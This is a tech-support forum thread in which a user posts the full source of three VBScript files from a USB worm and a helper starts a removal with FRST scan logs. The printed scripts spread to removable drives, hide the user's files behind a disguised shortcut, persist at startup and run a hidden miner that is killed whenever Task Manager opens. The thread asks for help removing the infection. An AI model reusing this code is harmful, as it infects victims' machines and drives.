Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Virus creates shortcuts on my Pen drive | .vbs Virus


  • This topic is locked This topic is locked
16 replies to this topic

#1 TheGoodGuy

TheGoodGuy

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:18 AM

Posted 13 July 2016 - 06:57 PM

My computer has a virus that creates on my pen drive shortcuts of itself. After many attempts to solve the problem, I found an hidden folder with 3 files: "helper.vbs", "installer.vbs" and "movemenoreg.vbs".

 

I know a little programming language and I know which part of the code the shortcut is created, but I can't find where the virus is located on my computer.

 

The code of this 3 files are bellow.

 

Thanks for your help!

 

 

 

"helper.vbs" file:

on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")


nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")


strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
startupPath = ws.SpecialFolders("startup")

miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)

MyScript = "helper.vbs"


While True
	key = Empty
	key = ws.regread (nkey)
	If (not IsEmpty(key)) then
	
		ws.RegWrite nkey, 2, "REG_BINARY"	
	End if
	
	If (not objws.fileexists(startupPath & "\helper.lnk")) then
		Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
		link.Description = "helper"
		link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
		link.WorkingDirectory = strPath
		link.Save
	End If

	Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

	call procheck(colProcess, "installer.vbs")

	Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
	Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")

	if colProcess.count = 0 And tskProcess.count = 0  then

		ws.Run miner, 0
	
	ElseIf colProcess.count > 0 And tskProcess.count > 0 then

		For Each objProcess In colProcess
			ws.run "taskkill /PID " & objProcess.ProcessId , 0 
		Next
		
	end if
	WScript.Sleep 3000
Wend



'---------------------------------------------------------------------------------

sub procheck(checkme, procname)

For Each objProcess In checkme
	vaprocess = objProcess.CommandLine
	
		if instr(vaprocess, procname) then
			Exit sub
		End if
	
Next

ws.Run Chr(34) & strPath & procname & Chr(34)

end sub

'--------------------------------------------------------------------------------


"installer.vbs" file:

on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"


'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)




'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")


Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")


While True

	Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
	call procheck(colProcess, "helper.vbs")
	
	Set objEvent = colEvents.NextEvent
	
	
	
	If objEvent.TargetInstance.DriveType = 2  Then
		If objEvent.Path_.Class = "__InstanceCreationEvent" Then
			device = objEvent.TargetInstance.DeviceID
			devicename = objEvent.TargetInstance.VolumeName
			DestFolder = device & "\WindowsServices"
			DummyFolder = device & "\" & "_"
			if (not objws.folderexists(DestFolder)) then
				objws.CreateFolder DestFolder	
				Set objDestFolder = objws.GetFolder(DestFolder)
				objDestFolder.Attributes = objDestFolder.Attributes + 39
			end if
			
			Call moveandhide ("\helper.vbs")
			Call moveandhide ("\installer.vbs")
			Call moveandhide ("\movemenoreg.vbs")
			Call moveandhide ("\WindowsServices.exe")
			
			if (not objws.fileexists (device & devicename & ".lnk")) then
				Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
				link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
				link.TargetPath = "%COMSPEC%" 
				link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
				link.windowstyle = 7
				link.Save
			End If
				
				
			if (not objws.folderexists(DummyFolder)) then
				objws.CreateFolder DummyFolder	
				Set objDestFolder = objws.GetFolder(DummyFolder)
				objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
				End If
			set check = objws.getFolder(device)
			Call checker(check)
			
		End If
	End If
	

	
	
Wend





sub checker (path)
	set home = path.Files
	For Each file in home
		Select Case file.Name
			Case devicename & ".lnk"
				'nothings
			Case Else
				objws.MoveFile path & file.Name, DummyFolder & "\"
		End Select
		
	Next
	
	set home = path.SubFolders
	For Each home in home
		Select Case home
			Case path & "_"
				'nothings
			Case path & "WindowsServices"
				'nothings
			Case path & "System Volume Information"
				'nothings'
			Case Else
				objws. MoveFolder home, DummyFolder & "\"
		End Select
		
	Next
	
end sub


'------------------------------------------------------------


sub moveandhide (name)
	if (not objws.fileexists(DestFolder & name)) then
		objws.CopyFile strFolder & name, DestFolder & "\"
		Set objmove = objws.GetFile(DestFolder & name)

		If not objmove.Attributes AND 39 then 
			objmove.Attributes = 0
			objmove.Attributes = objmove.Attributes + 39
		end if

	end if
end sub



'------------------------------------------------------------


sub procheck(checkme, procname)

For Each objProcess In checkme
	vaprocess = objProcess.CommandLine
	
		if instr(vaprocess, procname) then
			Exit sub
		End if
	
Next
ws.Run Chr(34) & strFolder  & "\" & procname & Chr(34)
end sub

"movemenoreg.vbs" file:

on error resume next
Dim  strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"




'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
ws.Run Chr(34) & pfolder & "\_" & Chr(34)


AppData = ws.ExpandEnvironmentStrings("%AppData%")



DestFolder = AppData & Target


if (not objws.folderexists(DestFolder)) then
	objws.CreateFolder DestFolder	
	Set objDestFolder = objws.GetFolder(DestFolder)
end if

Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39


sub moveandhide (name)
	if (not objws.fileexists(DestFolder & name)) then
		objws.CopyFile strFolder & name, DestFolder & "\"
		Set objmove = objws.GetFile(DestFolder & name)

		If not objmove.Attributes AND 39 then 
			objmove.Attributes = 0
			objmove.Attributes = objmove.Attributes + 39
		end if

	end if
end sub





Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

For Each objProcess In colProcess
	vaprocess = objProcess.CommandLine
		if instr(vaprocess, "helper.vbs") then
			WScript.quit
		End if
Next


ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)


Set ws = Nothing

Edit: The target of the shortcut on my Pen drive is "%COMSPEC% /C .\WindowsServices\movemenoreg.vbs".


Edited by TheGoodGuy, 14 July 2016 - 09:10 AM.


BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,773 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:12:18 AM

Posted 15 July 2016 - 09:52 AM

Greetings TheGoodGuy and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Please do this.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save it to your Desktop. <<< Important
  • Double click the icon
  • Click Yes to the disclaimer
  • Make sure the Addition.txt box is checked
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of both in your reply
===================================================

System Summary Information

--------------------
  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • FRST results
  • Addition log
  • System Summary Information

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 TheGoodGuy

TheGoodGuy
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:18 AM

Posted 15 July 2016 - 04:40 PM

Thanks for all your support! You can call me Telmo.

 

Scan files:

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 13-07-2016 02
Ran by User not found (administrator) on ERROR (15-07-2016 22:18:40)
Running from C:\Users\User not found\Downloads
Loaded Profiles: User not found (Available Profiles: User not found)
Platform: Windows 8.1 Pro (Update) (X64) Language: Português (Portugal)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\regedit.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Don HO don.h@free.fr) C:\Program Files (x86)\Notepad++\notepad++.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17709_none_fa7932f59afc2e40\TiWorker.exe
(Avast Software) C:\Program Files\AVAST Software\SZBrowser\launcher.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWXConfigManager.exe
(Avast Software) C:\Program Files\AVAST Software\SZBrowser\1.48.2066.114\SZBrowser_autoupdate.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-29] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [8900328 2016-07-13] (AVAST Software)
HKLM\...\Policies\Explorer: [NoAutorun] 1
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2917456 2016-06-15] (Valve Corporation)
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [26424960 2016-06-29] (Skype Technologies S.A.)
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\Run: [AdobeBridge] => [X]
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [178136 2016-06-29] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [155768 2016-06-29] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-07-13] (AVAST Software)
Startup: C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk [2016-06-29]
ShortcutTarget: helper.lnk -> C:\Users\User not found\AppData\Roaming\WindowsServices\helper.vbs ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{75C866C4-A430-4FAE-AF9D-71B6AAF83C57}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{75C866C4-A430-4FAE-AF9D-71B6AAF83C57}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-06-21] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-07-13] (AVAST Software)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-06-10] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-06-21] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-07-13] (AVAST Software)
BHO-x32: Microsoft Web Test Recorder 14.0 Helper -> {b924f0b4-0b3c-49c0-bab2-213fb9ebd1d3} -> C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll [2015-07-07] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-06-10] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-07-12] ()
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-07-12] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-06-21] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-06-10] (Microsoft Corporation)
FF Extension: Unseen - C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default\Extensions\unseen@tangrs.xpi [2016-06-15]
FF Extension: Adblock Plus - C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-06-15]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-07-13]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-07-13]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-07-13] (AVAST Software)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2944768 2016-06-10] (Microsoft Corporation)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-29] (NVIDIA Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-08-27] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-29] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-29] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-29] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2122248 2016-06-23] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75136 2016-06-23] ()
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [737984 2015-08-30] (@ByELDI) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-06-20] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-07-13] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-07-13] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108304 2016-07-13] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-07-13] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-07-13] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-07-13] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [473592 2016-07-13] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [162904 2016-07-13] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [290088 2016-07-13] (AVAST Software)
R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1390904 2013-10-15] (Motorola Solutions, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3345376 2013-09-04] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-29] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [56384 2016-06-29] (NVIDIA Corporation)
R3 RadioHIDMini; C:\Windows\System32\drivers\RadioHIDMini.sys [32168 2015-07-16] (Windows ® Win 7 DDK provider)
R3 SensorsSimulatorDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [226304 2014-11-21] (Microsoft Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
R3 WirelessKeyboardFilter; C:\Windows\System32\drivers\WirelessKeyboardFilter.sys [49384 2016-03-29] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-15 22:18 - 2016-07-15 22:19 - 00014501 _____ C:\Users\User not found\Downloads\FRST.txt
2016-07-15 22:18 - 2016-07-15 22:18 - 02390528 _____ (Farbar) C:\Users\User not found\Downloads\FRST64.exe
2016-07-15 22:18 - 2016-07-15 22:18 - 00000000 ____D C:\FRST
2016-07-15 14:55 - 2016-07-15 15:00 - 00000314 _____ C:\Users\User not found\Desktop\new 1.vbs
2016-07-15 14:54 - 2016-07-15 14:55 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Notepad++
2016-07-15 14:54 - 2016-07-15 14:54 - 04211112 _____ C:\Users\User not found\Downloads\npp.6.9.2.Installer.exe
2016-07-15 14:54 - 2016-07-15 14:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++
2016-07-15 14:54 - 2016-07-15 14:54 - 00000000 ____D C:\Program Files (x86)\Notepad++
2016-07-14 01:00 - 2016-05-23 10:38 - 00002187 _____ C:\Users\User not found\Desktop\helper
2016-07-14 00:59 - 2016-03-26 21:28 - 00001703 _____ C:\Users\User not found\Desktop\movemenoreg
2016-07-13 20:11 - 2016-07-13 20:11 - 00000446 __RSH C:\ProgramData\ntuser.pol
2016-07-13 19:56 - 2010-05-13 14:53 - 00047104 _____ (Inside Core) C:\Users\User not found\Downloads\AutoRunExterminator.exe
2016-07-13 19:54 - 2016-07-13 19:56 - 00017028 _____ C:\Users\User not found\Downloads\autorunexterminator-1.8.zip
2016-07-13 19:27 - 2016-07-13 19:27 - 00003892 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1468434428
2016-07-13 19:27 - 2016-07-13 19:27 - 00001053 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2016-07-13 19:27 - 2016-07-13 19:27 - 00001053 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-07-13 19:26 - 2016-07-13 19:26 - 00037144 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2016-07-13 19:25 - 2016-07-13 19:25 - 00001938 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2016-07-13 19:25 - 2016-07-13 19:25 - 00000000 ____D C:\Users\User not found\AppData\Roaming\AVAST Software
2016-07-13 19:25 - 2016-07-13 19:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2016-07-13 19:24 - 2016-07-13 19:25 - 00473592 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00390984 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-07-13 19:24 - 2016-07-13 19:24 - 00290088 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00162904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
